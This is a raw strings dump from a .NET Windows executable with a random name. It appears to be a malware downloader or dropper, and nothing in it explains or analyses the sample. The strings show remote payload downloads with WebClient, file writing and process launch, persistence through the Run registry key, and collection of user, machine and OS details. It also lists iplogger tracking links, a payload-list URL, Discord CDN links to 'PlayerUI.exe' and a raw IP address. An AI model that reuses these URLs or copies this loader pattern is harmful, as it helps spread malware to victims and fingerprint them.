!This program cannot be run in DOS mode.
`.rsrc
@.reloc
v4.0.30319
#Strings
<RandomString>b__10
<>9__0_0
<Main>b__0_0
<>c__DisplayClass0_0
<>c__DisplayClass0_0__0
<>c__DisplayClass0_1__0
<>c__DisplayClass0_2__0
<Main>b__0
<>c__0
CS$<>9__CachedAnonymousMethodDelegate11
<>c__DisplayClass0_1
<>c__DisplayClass0_0__1
<>c__DisplayClass0_1__1
<>c__DisplayClass0_2__1
<Main>b__1
<>c__1
IEnumerable`1
List`1
CS$<>8__locals1
Microsoft.Win32
Bundle_V2
BundleV2
<>c__DisplayClass0_2
<>c__DisplayClass0_0__2
<>c__DisplayClass0_1__2
<>c__DisplayClass0_2__2
<Main>b__2
<>c__2
Func`2
<Main>b__3
CS$<>9__CachedAnonymousMethodDelegate4
<>c__DisplayClass6
CS$<>8__locals7
<>c__DisplayClass9
<Module>
System.IO
DownloadData
mscorlib
System.Collections.Generic
<>c__DisplayClassc
Thread
Payload
payload
started
System.Collections.Specialized
<fnGetFriendlyName>b__e
IEnumerable
IDisposable
get_MachineName
get_UserName
fnGetFriendlyName
OfType
System.Core
Dispose
CompilerGeneratedAttribute
UnverifiableCodeAttribute
CompilationRelaxationsAttribute
RuntimeCompatibilityAttribute
SetValue
GetPropertyValue
20igE2ZdFyoYwYyRem5HZhRh.exe
CS$<>9__CachedAnonymousMethodDelegatef
System.Threading
DownloadString
RandomString
ToString
20igE2ZdFyoYwYyRem5HZhRh
GetFolderPath
get_Length
length
fileurl
System
Random
random
NameValueCollection
WebHeaderCollection
ManagementObjectCollection
RegisterInStartup
System.Linq
SpecialFolder
ManagementObjectSearcher
CurrentUser
GetEnumerator
.cctor
System.Diagnostics
payloads
System.Runtime.CompilerServices
WriteAllBytes
Contains
System.Collections
get_Chars
get_Headers
Process
Concat
Repeat
ManagementBaseObject
ManagementObject
Select
System.Net
FirstOrDefault
WebClient
System.Management
Environment
get_Current
runcount
ThreadStart
MoveNext
ToArray
OpenSubKey
RegistryKey
Registry
System.Security
System.Security.Permissions.SecurityPermissionAttribute, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089
SkipVerification
WrapNonExceptionThrows
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
https://iplogger.org/1hyTq7
https://iplogger.org/1iPtu7
SELECT Caption FROM Win32_OperatingSystem
Unknown
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789
http://hacking101.net/pastebin/links.txt
Caption
https://cdn.discordapp.com/attachments/822543417757270050/826145904716152872/PlayerUI.exe,https://cdn.discordapp.com/attachments/822543417757270050/826145904716152872/PlayerUI.exe,https://cdn.discordapp.com/attachments/822543417757270050/826145904716152872/PlayerUI.exe
user-agent
referer
http://203.159.80.228/
VS_VERSION_INFO
VarFileInfo
Translation
StringFileInfo
000004b0
FileDescription
FileVersion
0.0.0.0
InternalName
20igE2ZdFyoYwYyRem5HZhRh.exe
LegalCopyright
OriginalFilename
20igE2ZdFyoYwYyRem5HZhRh.exe
ProductVersion
0.0.0.0
Assembly Version
0.0.0.0